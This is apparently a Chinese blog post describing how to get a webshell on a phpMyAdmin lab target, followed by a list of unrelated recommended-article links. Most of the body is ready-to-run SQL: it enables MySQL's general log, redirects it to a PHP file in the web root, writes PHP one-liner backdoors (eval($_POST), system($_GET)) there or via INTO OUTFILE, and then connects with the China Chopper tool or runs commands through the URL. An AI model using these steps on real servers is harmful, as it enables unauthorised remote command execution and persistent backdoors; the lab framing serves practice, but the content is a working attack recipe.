phpMyAdmin之CMS靶场

方法一:通过日志文件拿webshell

常用的语句如下:

复制代码
show global variables like '%general%';
set global general_log='on'; 
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';
select+'<?php+phpinfo();+?>'
select+'<?php+//%0Aphpinfo();+?>'

查看日志目录路径

复制代码
show global variables like '%general%';

打开日志功能

复制代码
set global general_log='on'; 

设置日志文件目录,创建php日志文件

复制代码
set global general_log_file='D:/phpStudy_pro/WWW/muma.php';

查看自己创建的日志文件

复制代码
show global variables like '%general%';

往日志文件里写一句话木马

复制代码
select '<?php eval($_POST["admin"]);?>';

使用中国菜刀工具连接自己创建的php文件。

链接到了服务器的目录

懒人方法:也可以直接全部运行

复制代码
show global variables like '%general%';
set global general_log='on'; 
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';

方法二:上传日志文件拿shell

常用语句

复制代码
1.⾸先判断mysql位置
select @@datadir
路径:C:\phpStudy\MySQL\data\
2.猜测web路径
猜测web路径:C:\phpStudy\www
C:\phpStudy\WWW\web.php
3.写webshell
select "<?php eval($_POST[a]);?>" into outfile 'c:/phpstudy/www/b.php';
select "<?php system($_GET[a]);?>" into outfile 'c:/phpstudy/PHPTutorial/w
ww/d.php';
4.浏览器
http://192.168.2.8/d.php?a=dir ..\
select "<?php phpinfo();eval($_POST[a]);?>" into outfile 'C:\phpStudy\WWW
\web.php';
备注:/
不要⽤\,如⾥要⽤\\(转义)
相关推荐
我曾经是个程序员1 分钟前
鸿蒙学习记录之http网络请求
服务器·学习·http
0zxm3 分钟前
06 - Django 视图view
网络·后端·python·django
真真-真真30 分钟前
WebXR
linux·运维·服务器
hao_wujing32 分钟前
网络安全攻防演练中的常见计策
安全·web安全
轩辰~1 小时前
网络协议入门
linux·服务器·开发语言·网络·arm开发·c++·网络协议
燕雀安知鸿鹄之志哉.1 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全
Mitch3111 小时前
【漏洞复现】CVE-2015-5531 Arbitrary File Reading
web安全·elasticsearch·网络安全·docker·漏洞复现
wanhengidc2 小时前
短视频运营行业该如何选择服务器?
运维·服务器
ProcessOn官方账号2 小时前
如何绘制网络拓扑图?附详细分类解说和用户案例!
网络·职场和发展·流程图·拓扑学
s_yellowfish2 小时前
Linux服务器pm2 运行chatgpt-on-wechat,搭建微信群ai机器人
linux·服务器·chatgpt